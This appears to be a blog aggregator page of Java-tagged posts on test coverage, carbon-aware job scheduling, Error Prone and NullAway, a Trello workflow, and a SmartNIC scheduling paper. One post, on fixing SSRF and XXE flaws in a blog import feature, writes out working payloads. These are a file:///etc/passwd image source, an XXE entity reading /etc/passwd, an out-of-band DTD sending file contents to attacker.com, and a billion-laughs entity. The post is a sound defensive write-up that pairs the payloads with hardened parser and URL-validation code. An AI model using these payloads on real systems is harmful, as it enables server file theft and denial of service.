I recently read a few very interesting articles about personal libraries . Here is one that haunts me about Cormac McCarthy’s huge personal library and his vast, chaotic collection of “stuff”. For as long as I can remember, I’ve loved the idea of having a library of my own. But as I get older, something about it has started to feel unsettling. The thought of being surrounded by piles of things—books, objects, layers of accumulated life—now makes me uneasy. I crave order, clean spaces, and easy living unburdened by stuff. Large empty spaces and shelves call to me. I started collecting books when I was a student. They moved with me between different flats, and at one point I had over a thousand titles. I cherish them all, even the ones I haven’t read, because I agree with whoever said that reading and collecting books are two different hobbies. But as the saying goes, we spend the second half of our lives getting rid of the things we so fervently collected in the first half. I’ve been in that situation for several years now. I moved countries with a large container of stuff, only to realize I could probably have left 90% of it behind and never missed it. In fact, it took me years to slowly get rid of it. I wrote once about decluttering my clothes the Marie Kondo way. I’ve done the same with my house—again and again—until I got to a minimalist look and feel that I was happy with. For the past two years I’ve been in a very high-stress role at work, and sometimes taking care of my house, when everything else feels out of control, is the one thing I can do. I’m well aware of it, but it still leaves me with a nice, clean, minimal home. I live with a non-minimalist husband who, thankfully, gets on board every now and then. If it weren’t for him, it would be even more minimalist. Recently, after another round of spring cleaning, I finally got to my library. I’ve decluttered it many times since moving to New Zealand, but books are easy to come by here. 
There are lots of secondhand shops in town, and every February/March there’s a beautiful book fair where you can stock up for winter. It’s also easy to donate books, and I’ve been doing that. Still, I had too many. Reading those articles, and realizing I now read most of my books on Kindle, I felt the urge to minimize my library again. My criteria were simple: Get rid of books I’ve read and know I’ll never read again. Get rid of books I haven’t read but know I’ll probably never read. Get rid of books on subjects I’m no longer interested in, or that I could easily borrow from the library or download if I change my mind later. Get rid of novels I’ve saved for years, waiting to read, but never did. Having shelves so full was also stopping me from borrowing (but not buying) new books, because I felt weighed down by all the unread ones sitting at home. So I took all the books down. I got my husband to go through his too. Surprisingly, he got rid of quite a few. It was easier than I expected to minimize my library to the point where it now looks almost empty. People commented that it looks too empty. But I’m not worried. I feel like I can finally breathe. The books were gone in a day—donated, given to friends, or put on the book exchange shelves at work. What’s left are my true favorites, the ones I’ll reread. My husband’s books are breathing now too—he loves Bob Woodward and all kinds of political and spy thrillers, and he actually rereads them, so those stay. The goal isn’t to have no books at all, but to keep only the ones that genuinely matter, and to leave room for new interests when they arrive. So while I still appreciate big libraries—and if this were the 90s or early 2000s, when we didn’t have Kindles and books were harder or more expensive to get, I might still keep one—right now, a lighter library just feels better. 
There are still a few hundred books on my shelves (and I’ll admit to owning a set of about 50 nearly-new hardcover classics I picked up at an auction for $15. They’re currently sitting in the attic, waiting for some imaginary future where we have space to display them purely for decoration, because I doubt I’ll read them again). But my shelves can finally breathe, and so can I. I can happily pick up a book, flip through it, enjoy the moment, and put it back down—without feeling weighed down by the sheer volume of “stuff.” Here is the before, during and after of my library. Arguably, the before is more aesthetically pleasing, but the after makes me feel so much lighter, full of possibility. At this point in my life, I think I’d be completely fine not having any shelves or books at all. But even my kids, who don’t particularly enjoy reading (at least not the way I did when I was younger), were upset when I got rid of so many books—they say they like the feeling of them, the atmosphere they create. I agree. I love looking at other people’s libraries and I always will.

0 views
Brain Baking 2 weeks ago

Why I Don't Need a Steam Machine

For those of you who are living under a rock, Valve announced three new hardware devices joining their Steam Deck line-up: a new controller, a VR headset, and the GameCube—no wait, GabeCube—no wait, Steam Machine. The shiny little cube is undoubtedly Valve’s (second) attempt to break into the console market. This time, it might just work. The hardware is ready to arrive in your living room next spring. The biggest question is: will it arrive in our living room? Reading all the hype has certainly enthused me (e.g. Brendon’s The Steam Machine is the Future , PC Gamer’s Valve is all over ARM , Eurogamer’s Steam Machine preview , ResetEra’s Steam Hardware thread ); especially the part where the Machine is just a PC that happens to be tailored towards console gaming. According to Valve, you can install anything you want on it—it’s SteamOS, just like your trusty Deck, meaning you can boot into KDE and totally do your thing. Except that this shiny little cube is six times as powerful. I’m sure Digital Foundry will validate that next year. Valve's newly announced Steam Machine: a mysterious looking sleek black box. However, this post isn’t about specs, expectations, or dreams: it’s about tempering my own enthusiasm. I’d like to tell myself why I don’t really need a Steam Machine. The following list will hopefully make it easier to say no when the buy buttons become available. So you see, I don’t really need a Steam Machine… Fuck it, I’m getting one. Related topics: / steam / games / By Wouter Groeneveld on 16 November 2025.  Reply via email . You’re a retro gamer. You don’t need the power of six Steam Decks. To do what, run DOSBox? Your TV doesn’t support 4K . Again, no need for those 4K 60 FPS. You generally dislike AAA games. With the Steam Machine, you might be able to finally properly run DOOM Eternal and all of the Assassin’s Creed games. That you don’t like playing. You don’t have time to play games anyway. Ouch, that hurts but it’s not untrue.
The TV will be occupied anyway. The Steam Machine is not a Switch: you can’t switch to handheld mode. When are you going to play on the Machine if the TV is being used to watch your wife’s favourite shows? You already have too many gaming related hardware pieces. That’ll mean you’ll have to divide your time by an even bigger number to devote an equal amount to playing them. There’s no room for yet another nondescript box under the TV. See above: why don’t you first try to do something with that SNES Mini and PlayStation Mini besides letting it collect dust? You’re a physical gamer. This is Steam. There will be no insertion of cartridges, no blowing of carts, and no staring at game collections on a shelf. It’s Steam, not Good Old Games. Sure it can run GOG games but the Machine is primarily designed to run Steam. You avoid purchasing from Steam like the plague, yet you’re willing to buy a Machine dedicated to it? Are you crazy? The last time you booted Steam was over a year ago. Don’t tell me you’re suddenly interested in running the platform on a dedicated machine. You don’t have time to fiddle with configuration. Button and trackpad mappings to get the controls just right enough to play strategy games designed to be played with keyboard and mouse will only leave you frustrated. Your MacBook can emulate Windows games just fine. You recently bought CrossOver and played Wizordum and older Windows 98/XP stuff on it. It even runs Against The Storm flawlessly. No need for Proton or whatever. In two years, you’ll upgrade your M1 to an M4+: there’s the power upgrade. If CrossOver is struggling to run that particular game you so badly want to play, it’ll be buttery smooth in a few years. You’re going to do the laptop upgrade anyway regardless of the Steam Machine. You already have a huge gaming backlog. Thanks to your buddy Joel you bought too many physical Switch games that are still waiting to be touched. Are you really ready to open up another can of worms? 
You dislike a digital backlog. It’s easy to have hundreds of games on there: see your GOG purchases. Why don’t you try to count the ones that you actually played, let alone finished. You’re not going to use the Machine to run office software. Your laptop and other retro machines are good enough at handling that task. What are you really going to do with this cube besides gaming? Those cool looking indie games will be released for Switch in due time anyway. Remember Pizza Tower ? It’s out on Switch now. Remember to buy the cart on Fangamer, together with the Anton Blast one. It’s rumoured to cost more than . Save that money for a Switch 2 if the games are starting to become interesting to justify that upgrade, as currently, they’re not. Also, see the backlog point above. All HDMI ports both on the TV and your external monitors are occupied . Unless you’re willing to constantly switch cables, you’ll need to invest in a HDMI switch. Another . You can’t buy this without buying the Steam Controller. That’s easily another you already spent buying the Mobapad controller for your Switch as a replacement for the semi-broken Joy Cons. You can’t buy this as an expense on the company. You’re closing down the company, remember. (More on that later) The cool looking LED and programmable front display don’t justify an expensive purchase. After the initial excitement wears off, the LED will become annoying and you’ll simply turn it off.

0 views
Manuel Moreale 2 weeks ago

Nic Chan

This week on the People and Blogs series we have an interview with Nic Chan, whose blog can be found at nicchan.me . Tired of RSS? Read this in your browser or sign up for the newsletter . The People and Blogs series is supported by Numeric Citizen and the other 124 members of my "One a Month" club. If you enjoy P&B, consider becoming one for as little as 1 dollar a month. Hi, my name is Nic Chan! I'm a web developer and hobbyist artist who lives in Hong Kong. It's pretty funny, depending on who you ask, the audience is shocked to hear about my secret other life, since I typically keep these identities very separate. If I'm not tinkering with websites or frantically mixing paint, you might find me shitposting on Mastodon, sweating through the Hong Kong summers or volunteering at the cat shelter. Despite growing up on the internet, I had never intended to be a web developer. I studied Fine Arts at a small liberal arts college in California, where I solidified a vaguely Californian accent that haunts me till this day. I entered the working world hoping to start a career that would somehow be arts related, but quickly decided that it wasn't for me. The art world, especially at higher levels, feels very inauthentic and performative in a way that left me constantly tired. During that time, I managed to convince my employer that it would save them money if I also managed their website for them, and used that opportunity as a spring board to teach myself web development. Upon reflection, I have no idea how I managed to convince them that this was a good idea. Though some engagements were longer than others, I've been a freelance web developer for around 10 years now! I'm a web generalist, but the thing I want to do more of is building sustainable and accessible websites with core web technologies. This really is the reason I continue to do what I do! I love the web as a medium, and I want to see it thrive. 
The reason why I started posting on my blog was basically to prove to clients that I was a real, trustworthy person. Unfortunately, to have any sort of success as a freelancer, unless you are a literal savant, I think you need to do -some- kind of marketing, and blogging is the only method that I found acceptable to me personally. (LinkedIn was still a cesspit in 2015!) In recent years, the blog has very much drifted away from that original purpose. I now mostly post very long-form thoughts on tech industry topics, whenever I feel the need to. For some odd reason, my instructional/informative writing is not as popular as my ranting, so I will leave tech education to other folks! As far as my blog goes now, I probably spend an equal amount of time tinkering on random code parts of the site as writing blog posts. I want to explore more topics outside of web development and the tech industry in the future. My absolute favorite bloggers are the ones who 'bring their whole selves' to their blog, and post updates on their creative hobbies or whatever is on their mind at the moment. The thing I love about the IndieWeb is mostly the people behind it, so getting to bond over the little things like shared hobbies is one of the main draws for me. Fuck the technology, I'm here for the people. My blogging process is pretty simple. I might have an idea for a topic, and I'll create a file in Obsidian with as much information as I care to note down, and when I get a moment I will come back and write out the post, usually in a very linear way, in as many sittings as it takes to finish the draft. I switched to Obsidian sometime in 2025 and it really did help me get a lot more writing done than I did in years past — cloud-based SaaS solutions are fine, but apparently, if I have to log in to a website to start writing, that does pose a significant barrier to me actually getting any writing done. 
Having Obsidian just be there on my desktop removes that tiny bit of friction, and I had really underestimated how important that is to the creative process. Once a draft is done, I like to let things sit and marinate for a while, until I can read it again with 'fresh eyes.' You'll never find a super timely take on current events on my blog, I take far too long for that! I don't typically write additional drafts — call it a character flaw, but I'm far more likely to scrap an idea completely than to rework it in a substantial way. Shamefully, I have posts from over a year ago that are still about 90% complete. They will sit until I finally manage to push through whatever reservations I might have about posting and just hit the publish button. If I'm writing something more technical or industry-related, I will try to badger some folks to do a quick read-through. Special shoutout to my buddy EJ Mason for being the person who usually suffers through this task. I have a pretty particular desk setup for ergonomic/health reasons. I am physically incapable of being a laptop-in-a-coffee-shop kind of person, my fingers will start to turn numb as I use the trackpad, and I've used a custom keyboard layout for so long I can't really get work done on a traditional keyboard layout! If I'm writing at my computer, I need to be in my home office, at my PC, with my Ergodox EZ (a split ortholinear keyboard that has served me very well over the past few years), and a drawing tablet as a pointer device. I like it to be nice and quiet when I'm writing, if there's background noise, I can't hear my internal voice over the sound of other people speaking! Even with this particular setup, sitting at my desk does tire me out more than most people, so on very rare occasions I will draft a post with pen and paper. Unlike with computer writing, I'm completely agnostic as to what materials I actually write with, I've occasionally written post outlines on stray receipts or napkins.
I built my personal site with Astro and Svelte! I have a whole series on the topic of building my website if you want a peek under the hood at how I did it. There's so much I want to do to extend the site, but I find the biggest obstacle remains creating the graphics. The funny thing is, I definitely feel a sense of dread when looking at a blank canvas, even when I know what the final product is going to look like. Maybe putting this out there in the world will be the kick in the butt I need to make progress! Everything is managed in code and Markdown, without a CMS. Though it does have flaws and limitations when it comes to certain components, Markdown remains my favorite format for drafting pretty much anything. My site is currently hosted on Cloudflare. I fully admit that it's not very IndieWeb of me, I do feel strongly about potentially moving off big tech infrastructure, but I'm not very good at managing servers on my own and I'm a bit scared to do so with the prevalence of bad-faith crawlers. Yeah, I wouldn't write the components in Svelte. If you look back at my posts, I acknowledge that I would probably regret this decision and want to use web components later, but at the time I lacked the web components knowledge to execute the vision properly. No shade against Svelte, it's just that for something like my blog, I prefer to deal with less of a maintenance burden than I might willingly take on for a work project, since I'm only in the codebase a couple of times a year. There are some features/syntax that I'm using that will likely be deprecated in future versions of Svelte, so that's a pain I will have to deal with eventually. In my youth, I definitely had a bit of 'shiny new thing syndrome' when it came to web technologies. Nowadays, I prefer things that are more stable and slow. I've been burned just a few too many times for me to feel excited about proprietary technology! I pay $24 USD for a domain name.
I swear it used to be cheaper in the past! I also pay Plausible and Tinylytics as I believe in paying for privacy-respecting services. I started with Plausible, and at some point I became preoccupied with having a heart button for my posts, so I added Tinylytics. It's on my long list of todos to sort this out, I definitely don't need both. I mainly keep analytics to know where my posts are being linked from — doing this has helped me find some really awesome people and blogs (badum-tsh). Other than that, keeping the site running is free. This might change in the future, I do want to do more fun things that might require more financial resources, but I don't have any intent to monetize it, it's just a little home on the internet that I'm happy to throw cash at to keep the (metaphorical) lights on. In no particular order, here's a list of blogs I've been really enjoying. I think there will be some level of overlap with the People and Blogs folks, as I've been a long-time reader and found many folks worth following through this series, so thank you Manu! After rambling on for far too long for most of this, I'm finally at a loss for words. I'd be much obliged if you visited my site but you can also follow me on Mastodon if you have a hankering for some shelter cat pics. I have a submission coming out for the 'Free To Play' gaming-themed zine under Difference Engine , a Singaporean indie comics publisher. It's a collaboration with the narrative designer & writer Sarah Mak , I hope you'll check it out when the time comes! Now that you're done reading the interview, go check the blog and subscribe to the RSS feed . If you're looking for more content, go read one of the previous 115 interviews . Make sure to also say thank you to Luke Dorny and the other 124 supporters for making this series possible. Like Keenan , who I found from this series and is rapidly becoming one of my all-time favorite bloggers. Keenan is a true wordsmith, and an incredibly kind human.
They're so good at what they do, that they managed to completely break some assumptions I had about myself, like I thought I hated the podcast format of 'two friends chatting' until they started one with Halsted ! Ethan Marcotte has been absolutely killing it lately. His work is quiet and thoughtful, but in a wonderfully understated way that sticks in your brain for a long, long time. I've never seen anyone write as much as Jim Nielsen does and still have as many awesome posts. Come on, what's your secret Jim? Melanie Richards is one of the main reasons I want to start blogging about my other creative hobbies a bit more. She also has one of the prettiest blog designs I have ever seen! Everything I know about web sustainability, I have probably learned directly from Fershad Irani's blog . Eric Bailey writes the kind of posts that I send to every single person I know in the industry as soon as I see them hit my feed. Robert Kingett 's website tagline is 'A fabulously blind romance author', what's not to love? Robert has written numerous pieces that have completely reshaped how I feel about certain topics. His writing style is persuasive with a heaped tablespoon of humor for good measure. The final two folks don't post that regularly, but they are my friends so I am allowed to nudge them in the hope it will make them post more often. Jan Maarten and Katherine Yang have blogs that are so unapologetically them. More posts, please!

0 views
Neil Madden 2 weeks ago

Were URLs a bad idea?

When I was writing Rating 26 years of Java changes , I started reflecting on the new HttpClient library in Java 11. The old way of fetching a URL was to use URL.openConnection() . This was intended to be a generic mechanism for retrieving the contents of any URL: files, web resources, FTP servers, etc. It was a pluggable mechanism that could, in theory, support any type of URL at all. This was the sort of thing that was considered a good idea back in the 90s/00s, but has a bunch of downsides: Fetching different types of URLs can have wildly different security and performance implications, and wildly different failure cases. Do I really want to accept a mailto: URL or a javascript: “URL” ? No, never. And the API was forced to be lowest-common-denominator, so if you wanted to set options that are specific to a particular protocol then you had to cast the returned URLConnection to a more specific sub-class (and therefore lose generality). The new HttpClient in Java 11 is much better at doing HTTP, but it’s also specific to HTTP/HTTPS. And that seems like a good thing? In fact, in the vast majority of cases the uniformity of URLs is no longer a desirable aspect. Most apps and libraries are specialised to handle essentially a single type of URL, and are better off because of it. Are there still cases where it is genuinely useful to be able to accept a URL of any (or nearly any) scheme?
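To make the contrast concrete, here is a hedged sketch of both styles (no request is actually sent, and example.com is just a placeholder): the old API hands back a lowest-common-denominator URLConnection that must be downcast for anything HTTP-specific, while the Java 11 HttpClient is HTTP-only by construction.

```java
import java.net.HttpURLConnection;
import java.net.URI;
import java.net.URL;
import java.net.URLConnection;
import java.net.http.HttpClient;
import java.net.http.HttpRequest;

class UrlStyles {
    static String oldStyle() throws Exception {
        // Generic mechanism: openConnection() returns a URLConnection that
        // could represent any scheme; HTTP-specific options need a downcast.
        URLConnection conn = new URL("https://example.com/").openConnection();
        HttpURLConnection http = (HttpURLConnection) conn; // generality lost here
        http.setRequestMethod("GET");
        return http.getRequestMethod();
    }

    static String newStyle() {
        // Java 11 HttpClient: specific to HTTP/HTTPS, no casting needed.
        HttpClient client = HttpClient.newHttpClient();
        HttpRequest req = HttpRequest.newBuilder(URI.create("https://example.com/"))
                .GET()
                .build();
        return req.method();
    }
}
```

Note that openConnection() does no network I/O until you actually connect, which is exactly the kind of subtle, scheme-dependent behavior the generic API papered over.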

0 views
Neil Madden 2 weeks ago

Monotonic Collections: a middle ground between immutable and fully mutable

This post covers several topics around collections (sets, lists, maps/dictionaries, queues, etc) that I’d like to see someone explore more fully. To my knowledge, there are many alternative collection libraries for Java and for many other languages, but I’m not aware of any that provide support for monotonic collections . What is a monotonic collection, I hear you ask? Well, I’m about to answer that. Jesus, give me a moment. It’s become popular, in the JVM ecosystem at least, for collections libraries to provide parallel class hierarchies for mutable and immutable collections: Set vs MutableSet, List vs MutableList, etc. I think this probably originated with Scala , and has been copied by Kotlin , and various alternative collection libraries, e.g. Eclipse Collections , Guava , etc. There are plenty of articles out there on the benefits and drawbacks of each type. But the gulf between fully immutable and fully mutable objects is enormous: they are polar opposites, with wildly different properties, performance profiles, and gotchas. I’m interested in exploring the space between these two extremes. (Actually, I’m interested in someone else exploring it, hence this post). One such point is the idea of monotonic collections, and I’ll now explain what that means. By monotonic I mean here logical monotonicity : the idea that any information that is entailed by some set of logical formulas is also entailed by any superset of those formulas. For a collection data structure, I would formulate that as follows: If any (non-negated) predicate is true of the collection at time t , then it is also true of the collection at any time t’ > t . For example, if c is a collection and c.contains(x) returns true at some point in time, then it must always return true from then onwards. To make this concrete, a MonotonicList (say) would have an append operation, but not insert , delete , or replace operations. 
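A minimal Java sketch of such a type (the name and shape are my own, not from any existing library): appending and membership queries are allowed, while insert, delete, replace, and aggregate queries like size are simply absent from the interface.

```java
import java.util.ArrayList;
import java.util.List;

// Append-only: once contains(x) is true, it stays true forever.
// Deliberately no insert/delete/replace, and no size(): a reported
// size could be contradicted by a later append.
final class MonotonicList<T> {
    private final List<T> items = new ArrayList<>();

    public void append(T item) { items.add(item); }

    public boolean contains(T item) { return items.contains(item); }

    // Also monotonic: once an index exists, its value never changes.
    public T get(int index) { return items.get(index); }
}
```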
More subtly, monotonic collections cannot have any aggregate operations: i.e., operations that report statistics/summary information on the collection as a whole. For example, you cannot have a size method, as the size will change as new items are added (and thus the predicate can become false). You can have (as I understand it) map and filter operations, but not a reduce / fold . So why are monotonic collections an important category to look at? Firstly, monotonic collections can have some of the same benefits as immutable data structures, such as simplified concurrency. Secondly, monotonic collections are interesting because they can be (relatively) easily made distributed, per the CALM principle: Consistency as Logical Monotonicity (insecure link, sorry). This says that monotonic collections are strongly eventually consistent without any need for coordination protocols. Providing such collections would thus somewhat simplify making distributed systems. Interestingly, Kotlin decided to make their mutable collection classes sub-types of the immutable ones: MutableList is a sub-type of List, etc. (They also decided to make the arrows go the other way from normal in their inheritance diagram, crazy kids). This makes sense in one way: mutable structures offer more operations than immutable ones. But it seems backwards from my point of view: it says that all mutable collections are immutable, which is logically false. (But then they don’t include the word Immutable in the super types). It also means that consumers of a List can’t actually assume it is immutable: it may change underneath them. Guava seems to make the opposite decision: ImmutableList extends the built-in (mutable) List type, probably for convenience. Both options seem to have drawbacks. I think the way to resolve this is to entirely separate the read-only view of a collection from the means to update it. 
On the view side, we would have a class hierarchy consisting of ImmutableList, which inherits from MonotonicList, which inherits from the general List. On the mutation side, we’d have ListAppender and ListUpdater classes, where the latter extends the former. Creating a mutable or monotonic list would return a pair of the read-only list view and the mutator object. This seems to satisfy allowing the natural sub-type relationships between types on both sides of the divide. It’s a sort of CQRS at the level of data structures, but it seems to solve the issue that the inheritance direction for read-only consumers is the inverse of the natural hierarchy for mutating producers. (This has a relationship to covariant/contravariant subtypes, but I’m buggered if I’m looking that stuff up again in my free time.) Anyway, these thoughts are obviously pretty rough, but maybe some inklings of ideas if anyone is looking for an interesting project to work on.
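The post's original pseudocode didn't survive in this copy, so here is my own hedged reconstruction of the view/mutator split in Java (all names invented; assumes Java 16+ for records): creating a monotonic list hands back a read-only view plus a separate append-only handle.

```java
import java.util.ArrayList;
import java.util.List;

// Read-only views form one hierarchy...
interface ListView<T> { boolean contains(T x); T get(int i); }

// ...and mutators form a separate one: an appender can only grow the list.
interface ListAppender<T> { void append(T x); }

final class Lists {
    // The pair: a read-only view plus the (monotonic) mutation handle.
    record ViewAndAppender<T>(ListView<T> view, ListAppender<T> appender) {}

    static <T> ViewAndAppender<T> newMonotonicList() {
        List<T> backing = new ArrayList<>();
        ListView<T> view = new ListView<>() {
            public boolean contains(T x) { return backing.contains(x); }
            public T get(int i) { return backing.get(i); }
        };
        return new ViewAndAppender<>(view, backing::add);
    }
}
```

A consumer holding only the ListView can never mutate the list, and a ListAppender can never violate monotonicity, which is exactly the CQRS-for-data-structures flavor described above.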

0 views
Max Bernstein 2 weeks ago

A catalog of side effects

Optimizing compilers like to keep track of each IR instruction’s effects . An instruction’s effects vary wildly from having no effects at all, to writing a specific variable, to completely unknown (writing all state). This post can be thought of as a continuation of What I talk about when I talk about IRs , specifically the section talking about asking the right questions. When we talk about effects, we should ask the right questions: not what opcode is this? but instead what effects does this opcode have? Different compilers represent and track these effects differently. I’ve been thinking about how to represent these effects all year, so I have been doing some reading. In this post I will give some summaries of the landscape of approaches. Please feel free to suggest more. Internal IR effect tracking is similar to the programming language notion of algebraic effects in type systems, but internally, compilers keep track of finer-grained effects. Effects such as “writes to a local variable”, “writes to a list”, or “reads from the stack” indicate what instructions can be re-ordered, duplicated, or removed entirely. For example, consider two instructions in pseudocode for some made-up language that stands in for a snippet of compiler IR: a read of one location followed by a write to another. The goal of effects is to communicate to the compiler if, for example, these two IR instructions can be re-ordered. The second instruction might write to a location that the first one reads. But it also might not! This is about knowing if the two operands alias—if they are different names that refer to the same object. We can sometimes answer that question directly, but often it’s cheaper to compute an approximate answer: could they even alias? It’s possible that the two operands have different types, meaning that (as long as you have strict aliasing) the load and store operations that implement these reads and writes by definition touch different locations. And if they look at disjoint locations, there need not be any explicit order enforced.
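The original IR snippet is missing from this copy, so here is an invented Java stand-in for the two instructions: a read of one location followed by a write to another, where the optimizer's question is whether the two containers can share storage.

```java
import java.util.List;

class ReorderDemo {
    // Two "instructions": a read of a[0] and a write to b's element 0.
    // The optimizer wants to know: may a and b alias? Only if they are
    // guaranteed disjoint can the two lines be freely re-ordered.
    static Object demo(Object[] a, List<Object> b, Object v) {
        Object r = a[0]; // read
        b.set(0, v);     // write — may or may not touch a[0]'s storage
        return r;
    }
}
```

Even here the answer is subtle: b could be Arrays.asList(a), in which case the write really does clobber the location the read observed, and re-ordering the two lines would change the result.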
Different compilers keep track of this information differently. The null effect analysis gives up and says “every instruction is maximally effectful” and therefore “we can’t re-order or delete any instructions”. That’s probably fine for a first stab at a compiler, where you will get a big speed up purely based on strength reductions. Over-approximations of effects should always be valid. But at some point you start wanting to do dead code elimination (DCE), or common subexpression elimination (CSE), or loads/store elimination, or move instructions around, and you start wondering how to represent effects. That’s where I am right now. So here’s a catalog of different compilers I have looked at recently. There are two main ways I have seen to represent effects: bitsets and heap range lists. We’ll look at one example compiler for each, talk a bit about tradeoffs, then give a bunch of references to other major compilers. We’ll start with Cinder , a Python JIT, because that’s what I used to work on. Cinder tracks heap effects for its high-level IR (HIR) in instr_effects.h . Pretty much everything happens in the function, which is expected to know everything about what effects the given instruction might have. The data representation is a bitset representation of a lattice called an and that is defined in alias_class.h . Each bit in the bitset represents a distinct location in the heap: reads from and writes to each of these locations are guaranteed not to affect any of the other locations. Here is the X-macro that defines it: Note that each bit implicitly represents a set: does not refer to a specific list index, but the infinite set of all possible list indices. It’s any list index. Still, every list index is completely disjoint from, say, every entry in a global variable table. (And, to be clear, an object in a list might be the same as an object in a global variable table. The objects themselves can alias. 
But the thing being written to or read from, the thing being side-effected, is the container.) Like other bitset lattices, it’s possible to union the sets by or-ing the bits. It’s possible to query for overlap by and-ing the bits. If this sounds familiar, it’s because (as the repo notes) it’s a similar idea to Cinder’s type lattice representation . Like other lattices, there is both a bottom element (no effects) and a top element (all possible effects): Union operations naturally hit a fixpoint at and intersection operations naturally hit a fixpoint at . All of this together lets the optimizer ask and answer questions such as: Let’s take a look at an (imaginary) IR version of the code snippet in the intro and see what analyzing it might look like in the optimizer. Here is the fake IR: You can imagine that declares that it reads from the heap and declares that it writes to the heap. Because tuple and list pointers cannot be cast into one another and therefore cannot alias, these are disjoint heaps in our bitset. Therefore the intersection of their effects is empty, and these memory operations can never interfere! They can (for example) be re-ordered arbitrarily. In Cinder, these memory effects could in the future be used for instruction re-ordering, but they are today mostly used in two places: the refcount insertion pass and DCE. DCE involves first finding the set of instructions that need to be kept around because they are useful/important/have effects. So here is what the Cinder DCE looks like: There are some other checks in there but is right there at the core of it! Now that we have seen the bitset representation of effects and an implementation in Cinder, let’s take a look at a different representation and an implementation in JavaScriptCore. I keep coming back to How I implement SSA form by Fil Pizlo , one of the significant contributors to JavaScriptCore (JSC). In particular, I keep coming back to the Uniform Effect Representation section.
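Before looking at JSC's ranges, the bitset machinery just described can be sketched in a few lines of Java. The bit names below are invented for illustration; they are not Cinder's actual AliasClass entries.

```java
// Sketch of a bitset effect lattice: each bit represents a disjoint class
// of heap locations. Union is |, overlap is &, bottom is 0, top is ~0.
public class EffectBits {
    static final long EMPTY        = 0L;      // bottom: no effects
    static final long LIST_ITEM    = 1L << 0; // any list index
    static final long TUPLE_ITEM   = 1L << 1; // any tuple index
    static final long GLOBAL_TABLE = 1L << 2; // any global variable entry
    static final long ANY          = ~0L;     // top: all possible effects

    static long union(long a, long b)       { return a | b; }
    static boolean overlaps(long a, long b) { return (a & b) != 0; }

    public static void main(String[] args) {
        long readsTuple = TUPLE_ITEM;
        long writesList = LIST_ITEM;
        // Disjoint heaps: the load and the store can be reordered.
        System.out.println(overlaps(readsTuple, writesList)); // false
        // Anything unioned with ANY stays ANY (fixpoint at top).
        System.out.println(union(writesList, ANY) == ANY);    // true
    }
}
```

The fixpoint behavior falls out of the bit operations: `x | ~0 == ~0` and `x & 0 == 0`, which is exactly the "union saturates at top, intersection saturates at bottom" property described above.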
This notion of “abstract heaps” felt very… well, abstract. Somehow more abstract than the bitset representation. The pre-order and post-order integer pair as a way to represent nested heap effects just did not click. It didn’t make any sense until I actually went spelunking in JavaScriptCore and found one of several implementations—because, you know, JSC is six compilers in a trenchcoat [ citation needed ] . DFG, B3, DOMJIT, and probably others all have their own abstract heap implementations. We’ll look at DOMJIT mostly because it’s a smaller example and also illustrates something else that’s interesting: builtins. We’ll come back to builtins in a minute. Let’s take a look at how DOMJIT structures its abstract heaps: a YAML file. It’s a hierarchy. is a subheap of is a subheap of… and so on. A write to any is a write to is a write to … Sibling heaps are unrelated: and , for example, are disjoint. To get a feel for this, I wired up a simplified version of ZJIT’s bitset generator (for types!) to read a YAML document and generate a bitset. It generated the following Rust code: It’s not a fancy X-macro, but it’s a short and flexible Ruby script. Then I took the DOMJIT abstract heap generator —also funnily enough a short Ruby script—modified the output format slightly, and had it generate its int pairs: It already comes with a little diagram, which is super helpful for readability. Any empty range(s) represent empty heap effects: if the start and end are the same number, there are no effects. There is no one value, but any empty range could be normalized to . Maybe this was obvious to you, dear reader, but this pre-order/post-order thing is about nested ranges! Seeing the output of the generator laid out clearly like this made it make a lot more sense for me. What about checking overlap? Here is the implementation in JSC : (See also How to check for overlapping intervals and Range overlap in two compares for more fun.)
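The same idea can be sketched in Java: each abstract heap is a half-open [begin, end) interval taken from the pre/post-order numbering, subheaps nest inside their parents, and overlap is two comparisons. The heap names and numbers below are illustrative, not DOMJIT's generated values.

```java
// Sketch of JSC-DOMJIT-style abstract heap ranges. A subheap's interval
// nests inside its parent's; sibling intervals are disjoint.
record HeapRange(int begin, int end) {
    boolean isEmpty() { return begin == end; }

    // Two heaps may interact only if their intervals overlap. (JSC uses the
    // bare two-compare check and normalizes empty ranges; this sketch guards
    // explicitly instead so an un-normalized empty range never overlaps.)
    boolean overlaps(HeapRange other) {
        if (isEmpty() || other.isEmpty()) return false;
        return begin() < other.end() && other.begin() < end();
    }

    boolean isSubheapOf(HeapRange other) {
        return other.begin() <= begin() && end() <= other.end();
    }
}

public class HeapRangeDemo {
    public static void main(String[] args) {
        HeapRange heap       = new HeapRange(0, 10); // root: everything
        HeapRange globalVars = new HeapRange(0, 3);  // subheap of root
        HeapRange domState   = new HeapRange(3, 7);  // sibling of globalVars

        System.out.println(globalVars.overlaps(heap));     // true
        System.out.println(globalVars.overlaps(domState)); // false: siblings are disjoint
        System.out.println(domState.isSubheapOf(heap));    // true
    }
}
```

A write to a subheap overlaps its parent (and the root), while sibling heaps never overlap, which is exactly the hierarchy the YAML file encodes.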
While bitsets are a dense representation (you have to hold every bit), they are very compact and they are very precise. You can hold any number of combinations of 64 or 128 bits in a single register. The union and intersection operations are very cheap. With int ranges, it’s a little more complicated. An imprecise union of and can take the maximal range that covers both and . To get a more precise union, you have to keep track of both. In the worst case, if you want efficient arbitrary queries, you need to store your int ranges in an interval tree. So what gives? I asked Fil if both bitsets and int ranges answer the same question, why use int ranges? He said that it’s more flexible long-term: bitsets get expensive as soon as you need over 128 bits (you might need to heap allocate them!) whereas ranges have no such ceiling. But doesn’t holding sequences of ranges require heap allocation? Well, despite Fil writing this in his SSA post: The purpose of the effect representation baked into the IR is to provide a precise always-available baseline for alias information that is super easy to work with. […] you can have instructions report that they read/write multiple heaps […] you can have a utility function that produces such lists on demand. It’s important to note that this doesn’t actually involve any allocation of lists. JSC does this very clever thing where they have “functors” that they pass in as arguments that compress/summarize what they want to out of an instruction’s effects. Let’s take a look at how the DFG (for example) uses these heap ranges in analysis. The DFG is structured in such a way that it can make use of the DOMJIT heap ranges directly, which is neat. Note that in the example below is a thin wrapper over the DFG compiler’s own equivalent: is the function that calls these functors ( or in this case) for each effect that the given IR instruction declares. I’ve pulled some relevant snippets of , which is quite long, that I think are interesting. 
